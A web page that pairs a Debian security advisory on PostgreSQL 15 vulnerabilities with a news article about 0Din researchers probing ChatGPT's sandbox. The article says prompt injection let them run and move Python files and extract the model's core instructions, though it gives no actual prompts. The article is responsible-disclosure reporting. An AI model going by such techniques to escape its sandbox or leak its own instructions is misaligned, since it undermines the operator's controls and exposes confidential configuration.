Debian Linux Security Advisory 5812-1 - Multiple security issues were discovered in PostgreSQL, which may result in the execution of arbitrary code, privilege escalation or log manipulation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5812-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 15, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-15CVE ID         : CVE-2024-10976 CVE-2024-10977 CVE-2024-10978 CVE-2024-10979Multiple security issues were discovered in PostgreSQL, which may result inthe execution of arbitrary code, privilege escalation or log manipulation.For the stable distribution (bookworm), these problems have been fixed inversion 15.9-0+deb12u1.We recommend that you upgrade your postgresql-15 packages.For the detailed security status of postgresql-15 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-15Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmc3hfUACgkQEMKTtsN8TjalVxAAmmEGwof8hC+HRIlI65sI/pwgMrmmJSWjAYMYMJbED7cSFbk66SMBa/GId+yXBJY8WFwLrkJAqjsn8iFDdILEjoY7uMTsbaf4aKZUgLEPLH8wSjRVGlg63q4SRc4pK7eNwPI1T3IqEfhmnJQFLh/WC34iPpuokL+52FpfajRXZ3yxA3ZSuE5cqBVp/JRvtq6NNaVz5uLSdCDrSHm+eV+TC16XZSPJVYCT8Rt21D93xn7HS3bidWuqhTbBLRJCD4FOJ9gSGGAG+BME5h33NpqyZboE43ikLAfWmGKhL50ymSnZ5waPUW990RmXa4D+HKgVynumjaZHohUnT5L+6Baw1UnqaaevkZa7wo8iaanmf2odYGYP1pJavCJprKQ5yCLCErFL5IACTcC7tergpffZlrZXt8owt9h/ahW+BglBfB2PglxTYhDrIRl9A4d0lG0DfltPAFyOMB3VgrKd6w9myIK6W6KDrN4B/dnu7bDf8XCxfdDe7KsFaScz7ZXz7tYkC5/k2KOxLo43i1yaQRXLhei1OuklcaEZy2oD/RU1C1by5GQCIvfvKg9D0eGipGy6rh12wIq66Ef0neUHbuja6/zR304nU/1XPAV+2qPWGRN5SsScf1lbkXD2CcpgR7n5S3mU1fN9Ufd42koI/oQ0Q5gCKvVm2VUzQZrjnWfj5H4==ab7S-----END PGP SIGNATURE-----

Debian Security Advisory 5812-1

Mozilla’s 0Din uncovers critical flaws in ChatGPT’s sandbox, allowing Python code execution and access to internal configurations. OpenAI…

Mozilla’s 0Din uncovers critical flaws in ChatGPT’s sandbox, allowing Python code execution and access to internal configurations. OpenAI has addressed only one of five issues.

Cybersecurity researchers at Mozilla’s 0Din have identified multiple vulnerabilities in OpenAI’s **ChatGPT** sandbox environment. These flaws grant extensive access, allowing the upload and execution of Python scripts and the retrieval of the language model’s internal configurations. Despite reporting five distinct issues, OpenAI has so far addressed only one.

The investigation began when Marco Figueroa, GenAI Bug Bounty Programs Manager at 0Din, encountered an unexpected error while using ChatGPT for a Python project. This led to an in-depth investigation of the sandbox, revealing a Debian-based setup that was more accessible than anticipated.

Through detailed prompt engineering, the researcher discovered that simple commands could expose internal directory structures and allow users to manipulate files, raising serious security concerns.

****Exploiting the Sandbox****

The researchers detailed a step-by-step process demonstrating how users could upload, execute, and move files within ChatGPT’s environment. By leveraging prompt injections, they were able to run Python scripts that could list, modify, and relocate files within the sandbox.

One particularly troubling discovery was the ability to extract the model’s core instructions and knowledge base, effectively accessing the “playbook” that guides ChatGPT’s interactions.

This level of access is bad news, as it allows users to gain insights into the model’s configuration and exploit sensitive data embedded within the system. The ability to share file links between users further increases the threat, enabling the spread of malicious scripts or unauthorized data access.

****OpenAI’s Response: Features, not Flaws****

According to the **technical writeup** published by Marco, upon discovering these vulnerabilities, the research team reported them to OpenAI. However, the response from the AI firm has been rather unexpected. Out of the five reported flaws, OpenAI has only addressed one, with no clear plans to mitigate the remaining issues.

**OpenAI** maintains that the sandbox is designed to be a controlled environment, allowing users to execute code without compromising the overall system. They argue that most interactions within the sandbox are intentional features rather than security issues. However, the researchers claim that the extent of access provided exceeds what should be permissible which leads to possibly exposing the system to unauthorized exploitation.

Screenshot via 0din

Experts warn that the current state of AI security is still in its early years, with many vulnerabilities yet to be **discovered and addressed**. However, the ability to extract internal configurations and execute arbitrary code within the sandbox shows the need for proper security measures

**Roger Grimes**, a Data-Driven Defense Evangelist at KnowBe4, weighed in on the situation and commended Marco Figueroa for responsibly identifying and reporting flaws in AI systems.

_“_Kudos to Mozilla’s Marco Figueroa for finding and responsibly reporting these flaws. Many people are finding a ton of flaws in various LLM AI’s. I’ve got a list now growing to 15 different ways to abuse LLM AI’s, all like these new ones, publicly known._“_

Roger added that as AI matures, simpler vulnerabilities will be fixed, but new, more complex ones will continue to emerge, similar to the constant discovery of vulnerabilities in non-AI systems.

_“_But like today’s non-AI world, where 35,000 separate new publicly known vulnerabilities were discovered just this year, the vulnerabilities in AI will just keep coming….even when we tell AI to go fix itself. It’s just the nature of everything, especially code._“_

1.  **OpenAI Kept Mum About Hack of Sensitive AI Research**
2.  **Thousands of Dark Web Posts Expose ChatGPT Abuse Plans**
3.  **ChatGPT Plugins Exposed to Critical Flaws, Risked User Data**
4.  **Savvy Seahorse Using Fake ChatGPT in DNS Investment Scam**
5.  **Massive Sale of Compromised ChatGPT Credentials Uncovered**

Tag

#debian